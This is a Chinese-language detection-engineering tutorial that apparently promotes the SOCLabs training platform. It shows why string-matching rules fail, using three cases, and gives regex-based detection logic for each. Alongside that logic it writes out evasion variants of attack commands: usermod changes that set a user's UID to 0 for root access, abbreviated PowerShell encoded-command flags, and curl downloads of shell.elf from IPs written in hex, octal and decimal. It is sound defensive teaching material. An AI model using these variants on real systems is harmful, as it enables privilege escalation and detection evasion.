威胁检测入门指南：从零开始构建检测能力

在网络安全防御体系中，检测工程（Detection Engineering）是至关重要的一环。对于许多刚入行的安全分析师来说，编写检测规则似乎是一件门槛很低的事情："不就是写几个正则表达式，匹配几个关键词吗？"

然而，当你真正深入其中，会发现这其实是一个充满陷阱的雷区。一条看似完美的规则，可能因为攻击者改变了一个参数顺序、使用了一个简写，甚至只是多加了一个空格，就彻底失效。

在实战对抗中，这种基于文本表象的检测方式极其脆弱。攻击者会充分利用操作系统和程序的灵活性，轻松构造出功能相同但形式各异的攻击载荷，从而绕过静态规则。一个合格的检测工程师，需要对攻击手法有足够深入的理解，在编写规则时既要确保精准覆盖各类变体，又要避免对正常业务造成误报。

本文将通过几个实际案例，揭示检测规则编写中常见的陷阱，并探讨如何编写更加健壮有效的检测逻辑。

一、参数顺序与形式的多样性

在 Linux 权限维持场景中，攻击者可以使用 `usermod` 命令将普通用户的 UID 修改为 0。由于 UID 0 是 root 用户的标识，被修改后的账户将获得完整的 root 权限，但从账户名来看仍是普通用户，这种隐蔽的提权方式很难被管理员察觉。

攻击命令示例：

usermod -u 0 -o testuser

面对这条攻击命令，新手的第一反应往往是直接匹配命令关键字：

process_name = "usermod" AND command_line CONTAINS "-u 0 -o"

这条规则看似合理，但只要稍微了解 usermod 的命令特性，就会发现它存在严重的检测盲区。以下命令变体均可实现相同的提权效果，却都能绕过上述规则：

# 1：参数顺序调换
usermod -o -u 0 testuser

# 2：使用长参数格式
usermod --uid 0 --non-unique testuser

# 3：长短参数混用
usermod --uid 0 -o testuser

# 4：等号赋值格式
usermod -o --uid=0 testuser

# 5：-u 与 0 之间无空格
usermod -u0 -o testuser 

# 6：用户名位置变化
usermod testuser -u 0 -o

Linux 命令行解析器（如 getopt）天然支持参数顺序无关、长短参数等价（-u 与 --uid）、赋值格式多样（空格或等号）、参数值连写（-u0）等特性。这意味着同一条命令可以有数十种等价写法，简单的字符串匹配必然存在遗漏。

正确的做法是抓住命令的不变核心：无论如何变形，这个提权操作必须包含三个要素——命令主体 usermod、UID 参数（-u 或 --uid）、目标值 0。基于此，我们可以用正则表达式一次性覆盖所有变体：

process_name = "usermod" 
AND command_line REGEX "(-u\s*0\b|--uid[=\s]+0\b)"

这条正则的核心逻辑是：匹配 -u 后紧跟或间隔空格后跟 0，或匹配 --uid 后以等号或空格连接 0。由于正则本质上是"模式搜索"而非"位置匹配"，无论目标模式出现在命令行的任何位置都能被捕获，因此也天然解决了参数顺序问题。

二、参数变体与别名

Windows 环境下的 PowerShell 是攻击者的最爱，也是防御者的噩梦。为了隐藏恶意代码，攻击者经常使用 Base64 编码来执行命令。

常规最标准的执行方式是：powershell.exe -EncodedCommand <Base64String>

面对这类攻击，新手往往会写出这样的规则：

process_name = "powershell.exe" AND command_line CONTAINS "-EncodedCommand"

但这远远不够。PowerShell 的设计哲学极其灵活：参数支持前缀匹配（只要前几个字母能唯一标识即可）、大小写不敏感，还允许使用 - 或 / 作为参数引导符。这意味着 -EncodedCommand 这一个参数可以被逐级截断为任意前缀形式，以下写法全部等价且有效：


powershell -EncodedCommand SQBFAFgA...   # 完整参数
powershell -EncodedComman SQBFAFgA...    # 少1个字母
powershell -EncodedComma SQBFAFgA...     # 少2个字母
powershell -EncodedComm SQBFAFgA...      # 少3个字母
powershell -EncodedCom SQBFAFgA...       # 少4个字母
powershell -EncodedCo SQBFAFgA...        # 少5个字母
powershell -EncodedC SQBFAFgA...         # 少6个字母
powershell -Encoded SQBFAFgA...          # 少7个字母
powershell -Encode SQBFAFgA...           # 少8个字母
powershell -Encod SQBFAFgA...            # 少9个字母
powershell -Enco SQBFAFgA...             # 少10个字母
powershell -Enc SQBFAFgA...              # 少11个字母
powershell -En SQBFAFgA...               # 少12个字母
powershell -E SQBFAFgA...                # 最短形式
powershell /enc SQBFAFgA...              # 斜杠引导符
powershell -ec SQBFAFgA...               # 跳跃式缩写

要覆盖这些变体，规则需要同时匹配多个可执行文件名，并用正则表达式涵盖所有可能的参数形式：


process_name REGEX "(?i)(powershell|pwsh)(\.exe)?$"
AND command_line REGEX "(?i)[\s][-/](e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)[\s]"

这条正则穷举了从最短前缀到完整参数的所有合法形式，(?i) 确保大小写不敏感，[-/] 同时匹配两种引导符。

三、数据编码与等价表示

由于正常业务通常使用域名访问服务，直接请求 IP 地址的行为本身就具有一定的可疑性。假设检测工程团队需要检测 curl 请求 IP 地址而非域名的行为，新手工程师可能会写出这样的规则：

process_name = "curl"
AND command_line REGEX "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"

这条正则匹配标准的点分十进制 IP 地址，逻辑看似合理。但问题在于，IP 地址在操作系统层面存在多种等价表示形式，以下命令都能成功访问 192.168.1.100，却都不符合点分十进制格式：


# 标准点分十进制（被检测）
curl http://192.168.1.100/shell.elf

# 十六进制格式
curl http://0xC0.0xA8.0x1.0x64/shell.elf

# 八进制格式
curl http://0300.0250.01.0144/shell.elf

# 十进制整数格式
curl http://3232235876/shell.elf

# 混合进制格式
curl http://0xC0.168.0x1.100/shell.elf

# 省略中间零位（以 10.0.0.1 为例）
curl http://10.1/shell.elf

这些写法对人眼来说完全不像 IP 地址，但操作系统的网络库能够正确解析并建立连接。检测规则只覆盖了点分十进制这一种格式，对其他变体完全失效。

要用正则穷举所有变体几乎不可能实现。换个思路：既然目标是检测"使用 IP 地址而非域名"的请求，不妨反向思考——先匹配所有 curl 请求，排除目标为正常域名格式的情况，剩下的就是潜在的可疑请求。这种"排除正常"而非"穷举异常"的策略，能够有效覆盖各类 IP 编码变形。

四、总结

通过以上三个案例，我们可以看到检测规则编写中的共性挑战：操作系统和程序为了用户便利而设计的灵活性，恰恰成为了攻击者绕过检测的武器。参数可以调换顺序、可以缩写、可以用不同格式表示——这些对程序来说都是等价的，但对基于文本匹配的检测规则来说却是完全不同的字符串。

编写健壮的检测规则，核心思路有三点：一是抓住攻击行为的不变本质，而非拘泥于某一种具体写法；二是善用正则表达式的模式匹配能力，覆盖已知变体；三是在穷举困难时，考虑"排除正常"的逆向策略。

然而，理论与实战之间总存在差距。检测规则写出来之后，如何验证它已经覆盖了足够多的攻击变体？又如何确保它不会对正常业务产生误报？这些问题仅靠纸面推演很难回答。

这正是我们构建 SOCLabs 平台的初衷。SOCLabs 是一个专注于威胁检测学习和实战训练的平台，每个检测挑战都包含大量真实的绕过技巧和混淆变体数据，用于评估你编写的检测规则是否足够健壮。同时，平台还内置了丰富的正常业务干扰数据——这些数据来自经验丰富的检测工程师在实际生产环境中积累的案例，能够帮助你在追求检出率的同时，有效控制误报率。

检测工程没有一劳永逸的银弹，它本质上是一场持续的攻防博弈。如果你想在真实对抗场景中磨练自己的检测能力，欢迎访问 SOCLabs，在实战中成长为更优秀的检测工程师。